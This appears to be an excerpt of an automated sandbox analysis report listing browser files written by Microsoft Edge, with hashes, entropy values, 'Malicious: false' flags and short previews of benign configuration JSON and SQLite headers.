Preview:	2024/11/08-20:47:24.368 1dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/08-20:47:24.371 1dc8 Recovering log #3.2024/11/08-20:47:24.854 1dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb\LOG.old (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	ASCII text
Category:	dropped
Size (bytes):	342
Entropy (8bit):	5.189832056750109
Encrypted:	false
SSDEEP:	6:Htu+q2PcNwi23oH+Tcwt8a2jMGIFUt8YtkXZmw+YtpQdVkwOcNwi23oH+Tcwt8as:NfvLZYeb8EFUt8EkX/+Ec54ZYeb8bJ
MD5:	EB194F658AE912AE91F702ED841791E0
SHA1:	50CE9856711393F9A056EA2646E4BB248EEC8C56
SHA-256:	FC087EE3C94E9B1B5215C3D50FDD822B6E0BA530DA3A6EF6DF59C4DF1D558275
SHA-512:	179324B2F189C30505058BB4D4698887DD915FC94B002884B4398C16E487E9EEA0628D5F0AA71424F4BE0C7837503A729DB601787ACE3B65CE9F783B8BC02121
Malicious:	false
Preview:	2024/11/08-20:47:24.368 1dc8 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/MANIFEST-000001.2024/11/08-20:47:24.371 1dc8 Recovering log #3.2024/11/08-20:47:24.854 1dc8 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Local Storage\leveldb/000003.log .

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\0f73eb80-ef22-4a0f-9a9e-0db96c64ae73.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\1860f5ca-a844-4883-8681-bef2df6d2edd.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\37ce723a-cf04-4611-8caa-4a1d833a8326.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\3fab6aa4-1f6e-478f-a63e-aea6a08dab0f.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.3035190857054575
Encrypted:	false
SSDEEP:	48:YcCpWsduCvsafc7leeBRsygCgkhYhbyDF:F2vu22keBxukOhy
MD5:	D07414264D2DA6A121F18223DC50EC04
SHA1:	814D93916C113C3BCB1AFF03A5AB5E9CB2A7BD1E
SHA-256:	D594EC617D902BC5C2742BDF21E9D7DFD29CC95A3C1AA7EC8C2D7BA07417A54B
SHA-512:	93746830632AE0D4E0A764C1226D21474C1282831E1A642ED37973841C5AB1E0FB63F89D55B3ACA3460EC3510D464ABCE7157A5128B5DA694AB3D1A7A53D56A4
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\64dc58ab-2a51-40a3-87fc-c5600cc20d7e.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Cookies

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 8, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	2.7697382259587444
Encrypted:	false
SSDEEP:	192:tTuHKGulWoqhdFv408gnvBoZXtI51iszhcKh58Ok8WYbaACvfXcf0L/ZJVb:ViBWSZods1V4fXI0LhJVb
MD5:	C2047C22EDC7A43000E57EF71E6EC1A4
SHA1:	44867B21BED978424DF79FA0B0865C0EA66C7194
SHA-256:	A5595ACCAF61B467FE601D8B8DDB0DC8D23391C6F3226606011C6FDDE8E130A8
SHA-512:	CECC97C458621201245823387A68ADD91555B0B00647E1B5DAF4CB4A03AC47658F2130929AD0E222D6A124F841322EC767FD1B3C9811A36A118A96C23AB19125
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.3035190857054575
Encrypted:	false
SSDEEP:	48:YcCpWsduCvsafc7leeBRsygCgkhYhbyDF:F2vu22keBxukOhy
MD5:	D07414264D2DA6A121F18223DC50EC04
SHA1:	814D93916C113C3BCB1AFF03A5AB5E9CB2A7BD1E
SHA-256:	D594EC617D902BC5C2742BDF21E9D7DFD29CC95A3C1AA7EC8C2D7BA07417A54B
SHA-512:	93746830632AE0D4E0A764C1226D21474C1282831E1A642ED37973841C5AB1E0FB63F89D55B3ACA3460EC3510D464ABCE7157A5128B5DA694AB3D1A7A53D56A4
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Network Persistent State~RF354c8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	1618
Entropy (8bit):	5.3035190857054575
Encrypted:	false
SSDEEP:	48:YcCpWsduCvsafc7leeBRsygCgkhYhbyDF:F2vu22keBxukOhy
MD5:	D07414264D2DA6A121F18223DC50EC04
SHA1:	814D93916C113C3BCB1AFF03A5AB5E9CB2A7BD1E
SHA-256:	D594EC617D902BC5C2742BDF21E9D7DFD29CC95A3C1AA7EC8C2D7BA07417A54B
SHA-512:	93746830632AE0D4E0A764C1226D21474C1282831E1A642ED37973841C5AB1E0FB63F89D55B3ACA3460EC3510D464ABCE7157A5128B5DA694AB3D1A7A53D56A4
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218151956","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"anonymization":["FAAAAA8AAABodHRwczovL21zbi5jb20A",false],"server":"https://assets.msn.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13343557218812706","port":443,"protocol_str":"quic"}],"anonymization":["JAAAAB0AAABodHRwczovL2dvb2dsZXVzZXJjb250ZW50LmNvbQAAAA==",false],"server":"https://clients2.googleusercontent.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwc

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Reporting and NEL

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 9, database pages 9, cookie 0x4, schema 4, UTF-8, version-valid-for 9
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	1.4823113831148313
Encrypted:	false
SSDEEP:	96:ifIEumQv8m1ccnvSwDHnoG9WhXosRtP6sFcOw1a:ifIEumQv8m1ccnvSAo4WRouPqOr
MD5:	FA3D33354F6DFA9D43A2F25D7E2CF213
SHA1:	2ADEB33D75D64CE67F3F3CFCDBB6B0FDE92652E0
SHA-256:	D3F608F493E37B631279CDEA50CC4E88BD0E485AB86A8526B6560CE780C6D591
SHA-512:	A4824714E1B4212D7F32BC6E85FD27A778615B2E7A29F85E2326118359FF905A62403FDAC8882F9007D2FD3768D3271EF6C3D7C0DE4CA6AC8FD05BFF22C8920C
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j..........g...D.........7............................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF240c8.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF25569.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\SCT Auditing Pending Reports~RF2620b.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\Sdch Dictionaries (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	40
Entropy (8bit):	4.1275671571169275
Encrypted:	false
SSDEEP:	3:Y2ktGMxkAXWMSN:Y2xFMSN
MD5:	20D4B8FA017A12A108C87F540836E250
SHA1:	1AC617FAC131262B6D3CE1F52F5907E31D5F6F00
SHA-256:	6028BD681DBF11A0A58DDE8A0CD884115C04CAA59D080BA51BDE1B086CE0079D
SHA-512:	507B2B8A8A168FF8F2BDAFA5D9D341C44501A5F17D9F63F3D43BD586BC9E8AE33221887869FA86F845B7D067CB7D2A7009EFD71DDA36E03A40A74FEE04B86856
Malicious:	false
Preview:	{"SDCH":{"dictionaries":{},"version":2}}

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ab3f9ad4-19f1-4483-b0de-9a3252eed477.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	2
Entropy (8bit):	1.0
Encrypted:	false
SSDEEP:	3:H:H
MD5:	D751713988987E9331980363E24189CE
SHA1:	97D170E1550EEE4AFC0AF065B78CDA302A97674C
SHA-256:	4F53CDA18C2BAA0C0354BB5F9A3ECBE5ED12AB4D8E11BA873C2F11161202B945
SHA-512:	B25B294CB4DEB69EA00A4C3CF3113904801B6015E5956BD019A8570B1FE1D6040E944EF3CDEE16D0A46503CA6E659A25F21CF9CEDDC13F352A3C98138C15D6AF
Malicious:	false
Preview:	[]

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\ef5b2e32-6c84-4fec-be75-e23c809cf8d0.tmp

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	modified
Size (bytes):	2011
Entropy (8bit):	5.298242582728465
Encrypted:	false
SSDEEP:	48:YcCpfgCzs+ftsHleeBRsSfc7kEsCJCgHCsmCgHGbyDF:F2fNfUkeBp2kOJT4TGy
MD5:	1B46C0275754E6733339B7C8A77356FE
SHA1:	06C11DC3B28AE6937A944754F35F7CB4BBE8F91C
SHA-256:	541C0AFDE8D847971F7ABC79E91D845C64275E7C86D43314EED5739D6E810C47
SHA-512:	D765EACDBEF1E8AAA1EDCD623109A534EF9376D342BDDE4EBB6CAC6347E286017F0A19E0459BF4681C8EC9E9D3F139F43CFA0001587B0C24D8A62122C8E7C998
Malicious:	false
Preview:	{"net":{"http_server_properties":{"servers":[{"anonymization":["FAAAAA4AAABodHRwOi8vbXNuLmNvbQAA",false],"server":"https://assets.msn.com","supports_spdy":true},{"anonymization":["IAAAABoAAABodHRwczovL3d3dy5nb29nbGVhcGlzLmNvbQAA",false],"server":"https://www.googleapis.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13378182446789245","port":443,"protocol_str":"quic"}],"anonymization":["GAAAABIAAABodHRwczovL2dvb2dsZS5jb20AAA==",false],"server":"https://clients2.google.com","supports_spdy":true},{"alternative_service":[{"advertised_alpns":["h3"],"expiration":"13375684052110995","port":443,"protocol_str":"quic"}],"anonymization":["HAAAABUAAABodHRwczovL21pY3Jvc29mdC5jb20AAAA=",false],"server":"https://msedgeextensions.sf.tlu.dl.delivery.mp.microsoft.com","supports_spdy":true},{"anonymization":["HAAAABUAAABodHRwczovL2F6dXJlZWRnZS5uZXQAAAA=",false],"server":"https://edgeassetservice.azureedge.net","supports_spdy":true},{"alternative_service":[{"ad

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Nurturing\campaign_history

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, file counter 3, database pages 5, cookie 0x2, schema 4, UTF-8, version-valid-for 3
Category:	dropped
Size (bytes):	20480
Entropy (8bit):	0.8350301952073809
Encrypted:	false
SSDEEP:	24:TLSOUOq0afDdWec9sJlAMoqsgC7zn2z8ZI7J5fc:T+OUzDbg3sAM/sgCnn2ztc
MD5:	0DAD8D7F079797377CD56DAE47E1A619
SHA1:	A353C01C5B9BA9E0315ABA74D3337B7D6EE97CB2
SHA-256:	7BDA584E0C1BE9E104065370FD279A7E771D7EB4F7E4CC7C80F146931F150E33
SHA-512:	5A57C0D303672564DDEAA08B5DAAEE1BA24B67C46100720CE69F0908427ACE55F330D96A772D0E1F96B595FBBD70E6145AA464FC4F312EFE095F9AC909E304E8
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13537
Entropy (8bit):	5.232101399901564
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP9kaDNovg58rbV+Fm5QwxrLPouNYJ:sttPGKSu4asrutJMbGUQw1C
MD5:	C0A63C690A55E5DB989ABB66795E16D1
SHA1:	C9BF2ADA895A08DAC8C45886B72E3BF2C8299B10
SHA-256:	BE173D490092E474CDA279FC5B810212385302863FA94EDEA8058FD67F83031F
SHA-512:	24E88A7F957D18CEB929EF9883FE5BC028C1A7546150339BF7C618333A323731A20C47514B0D47F2DC06B8DFB64E443973CEEF361CE417B4BCF307D16A6E4B62
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF28061.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13537
Entropy (8bit):	5.232101399901564
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP9kaDNovg58rbV+Fm5QwxrLPouNYJ:sttPGKSu4asrutJMbGUQw1C
MD5:	C0A63C690A55E5DB989ABB66795E16D1
SHA1:	C9BF2ADA895A08DAC8C45886B72E3BF2C8299B10
SHA-256:	BE173D490092E474CDA279FC5B810212385302863FA94EDEA8058FD67F83031F
SHA-512:	24E88A7F957D18CEB929EF9883FE5BC028C1A7546150339BF7C618333A323731A20C47514B0D47F2DC06B8DFB64E443973CEEF361CE417B4BCF307D16A6E4B62
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF2cc7d.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13537
Entropy (8bit):	5.232101399901564
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP9kaDNovg58rbV+Fm5QwxrLPouNYJ:sttPGKSu4asrutJMbGUQw1C
MD5:	C0A63C690A55E5DB989ABB66795E16D1
SHA1:	C9BF2ADA895A08DAC8C45886B72E3BF2C8299B10
SHA-256:	BE173D490092E474CDA279FC5B810212385302863FA94EDEA8058FD67F83031F
SHA-512:	24E88A7F957D18CEB929EF9883FE5BC028C1A7546150339BF7C618333A323731A20C47514B0D47F2DC06B8DFB64E443973CEEF361CE417B4BCF307D16A6E4B62
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Preferences~RF341bd.TMP (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	13537
Entropy (8bit):	5.232101399901564
Encrypted:	false
SSDEEP:	192:sttJ99QTryDigabatSuypasruyaNP9kaDNovg58rbV+Fm5QwxrLPouNYJ:sttPGKSu4asrutJMbGUQw1C
MD5:	C0A63C690A55E5DB989ABB66795E16D1
SHA1:	C9BF2ADA895A08DAC8C45886B72E3BF2C8299B10
SHA-256:	BE173D490092E474CDA279FC5B810212385302863FA94EDEA8058FD67F83031F
SHA-512:	24E88A7F957D18CEB929EF9883FE5BC028C1A7546150339BF7C618333A323731A20C47514B0D47F2DC06B8DFB64E443973CEEF361CE417B4BCF307D16A6E4B62
Malicious:	false
Preview:	{"aadc_info":{"age_group":0},"account_tracker_service_last_update":"13375590444416050","alternate_error_pages":{"backup":true},"apps":{"shortcuts_arch":"","shortcuts_version":0},"arbitration_experiences":{},"arbitration_local_nsat_reset_time":"13340965831357520","arbitration_using_experiment_config":false,"autocomplete":{"retention_policy_last_version":117},"browser":{"available_dark_theme_options":"All","has_seen_welcome_page":false,"history_in_shoreline_activated":true,"hub_app_non_synced_preferences":{"apps":{"06be1ebe-f23a-4bea-ae45-3120ad86cfea":{"last_path":""},"0c835d2d-9592-4c7a-8d0a-0e283c9ad3cd":{"last_path":""},"168a2510-04d5-473e-b6a0-828815a7ca5f":{"last_path":""},"1ec8a5a9-971c-4c82-a104-5e1a259456b8":{"last_path":""},"2354565a-f412-4654-b89c-f92eaa9dbd20":{"last_path":""},"25fe2d1d-e934-482a-a62f-ea1705db905d":{"last_path":""},"2caf0cf4-ea42-4083-b928-29b39da1182b":{"last_path":""},"2cb2db96-3bd0-403e-abe2-9269b3761041":{"last_path":""},"35a43603-bb38-4b53-ba20-932cb9117

C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Secure Preferences (copy)

Download File

Process:	C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
File Type:	JSON data
Category:	dropped
Size (bytes):	37149
Entropy (8bit):	5.564737347223386
Encrypted:	false
SSDEEP:	768:5ZGaxaWPnvfS38F1+UoAYDCx9Tuqh0VfUC9xbog/OV12tWiEirwUg2bqKpktuZ:5ZGaxaWPnvfS3u1jas2tXEHUg2+ZtK
MD5:	18F1B7FC6ECD564EFA5AC69C12A83A86
SHA1:	A6B877D1A7E47FFD130DCC13D78F89F96896CBA7
SHA-256:	3B64268FA832215AABCD16571D42279C198C2C9D43C4C7C9014FBC7BC21E1D9B
SHA-512:	343CF70AACEF770AC2157537448A5D6BE820BBD76A1E6C763F9F1E73380C7665E37DE8214BA0FBCF126C66459B4527092B5C2E3FCBB16924F2BC4F3756689766
Malicious:	false
